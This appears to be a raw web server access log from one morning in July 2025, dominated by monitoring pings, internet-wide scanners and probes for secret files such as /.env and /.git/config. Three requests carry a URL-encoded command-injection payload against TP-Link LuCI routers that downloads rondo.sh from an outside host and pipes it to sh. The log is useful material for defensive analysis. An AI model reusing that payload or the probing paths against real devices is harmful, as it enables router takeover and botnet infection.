45.156.129.128 - - [03/Jul/2025:07:07:19 +0200] "GET /internal_forms_authentication HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:07:26 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:07:30 +0200] "GET /console HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [03/Jul/2025:07:07:36 +0200] "GET /cgi-bin/main.pl HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [03/Jul/2025:07:07:36 +0200] "GET /aspera/faspex/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:07:36 +0200] "GET /css/images/PTZOptics_powerby.png HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
176.65.148.203 - - [03/Jul/2025:07:07:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:07:07:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:07:08:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:07:08:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:07:09:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:07:09:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:10:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:11:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:12:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:13:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:14:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:07:15:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.123.72.134 - - [03/Jul/2025:07:15:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:07:15:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:16:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:17:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:18:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:19:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:20:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.37.199.251 - - [03/Jul/2025:07:21:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
204.76.203.219 - - [03/Jul/2025:07:21:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:07:21:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:22:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:07:23:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:07:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
46.23.108.183 - - [03/Jul/2025:07:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
185.242.226.116 - - [03/Jul/2025:07:24:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:24:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.242.226.116 - - [03/Jul/2025:07:24:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
45.135.194.11 - - [03/Jul/2025:07:24:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
87.121.84.130 - - [03/Jul/2025:07:25:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:07:25:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.242.226.116 - - [03/Jul/2025:07:25:56 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
43.166.131.228 - - [03/Jul/2025:07:26:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:07:26:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [03/Jul/2025:07:27:27 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:28:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.194.11 - - [03/Jul/2025:07:28:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
45.55.220.88 - - [03/Jul/2025:07:29:50 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
45.55.220.88 - - [03/Jul/2025:07:29:50 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [03/Jul/2025:07:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:30:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.242.226.116 - - [03/Jul/2025:07:31:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [03/Jul/2025:07:31:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:31:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:32:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.159.152.184 - - [03/Jul/2025:07:33:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:07:33:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:07:34:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [03/Jul/2025:07:34:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:34:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
135.237.125.155 - - [03/Jul/2025:07:34:54 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
135.237.125.155 - - [03/Jul/2025:07:34:55 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
135.237.125.155 - - [03/Jul/2025:07:34:55 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
135.237.125.155 - - [03/Jul/2025:07:35:04 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
135.237.125.155 - - [03/Jul/2025:07:35:12 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
135.237.125.155 - - [03/Jul/2025:07:35:34 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [03/Jul/2025:07:35:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
135.237.125.155 - - [03/Jul/2025:07:36:15 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.114 - - [03/Jul/2025:07:36:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.114 - - [03/Jul/2025:07:36:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [03/Jul/2025:07:36:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
135.237.125.155 - - [03/Jul/2025:07:37:13 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
135.237.125.155 - - [03/Jul/2025:07:37:39 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [03/Jul/2025:07:37:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
135.237.125.155 - - [03/Jul/2025:07:37:56 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 339 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [03/Jul/2025:07:38:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:07:39:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:07:39:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [03/Jul/2025:07:40:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:07:40:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:41:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:42:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:43:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.242.226.116 - - [03/Jul/2025:07:44:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:44:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.156.52 - - [03/Jul/2025:07:44:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
64.62.156.152 - - [03/Jul/2025:07:45:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
65.49.1.10 - - [03/Jul/2025:07:45:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
176.65.148.203 - - [03/Jul/2025:07:45:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:07:45:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.2 - - [03/Jul/2025:07:45:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.92.191.155 - - [03/Jul/2025:07:46:35 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:46:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:07:46:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
103.136.147.164 - - [03/Jul/2025:07:46:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
141.98.10.162 - - [03/Jul/2025:07:47:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.242.226.116 - - [03/Jul/2025:07:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:47:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [03/Jul/2025:07:47:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.242.226.116 - - [03/Jul/2025:07:48:25 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
65.49.1.19 - - [03/Jul/2025:07:48:50 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:48:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.156.158 - - [03/Jul/2025:07:48:53 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0"
64.62.156.60 - - [03/Jul/2025:07:49:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (iPad; CPU OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
64.62.197.15 - - [03/Jul/2025:07:49:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
64.62.197.2 - - [03/Jul/2025:07:49:33 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
64.62.156.152 - - [03/Jul/2025:07:49:39 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
65.49.1.10 - - [03/Jul/2025:07:49:40 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
64.62.156.52 - - [03/Jul/2025:07:49:49 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:49:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.252.11.151 - - [03/Jul/2025:07:50:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.135.194.11 - - [03/Jul/2025:07:50:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:50:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:51:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:07:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.203 - - [03/Jul/2025:07:53:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
34.52.240.57 - - [03/Jul/2025:07:53:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
212.91.247.32 - - [03/Jul/2025:07:53:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.242.226.116 - - [03/Jul/2025:07:53:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
176.65.148.183 - - [03/Jul/2025:07:54:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:07:54:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.187 - - [03/Jul/2025:07:55:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.187 - - [03/Jul/2025:07:55:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.187 - - [03/Jul/2025:07:55:32 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.187 - - [03/Jul/2025:07:55:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.187 - - [03/Jul/2025:07:55:41 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.187 - - [03/Jul/2025:07:55:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.10.162 - - [03/Jul/2025:07:55:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.187 - - [03/Jul/2025:07:55:45 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.247.32 - - [03/Jul/2025:07:55:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.128.149.102 - - [03/Jul/2025:07:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
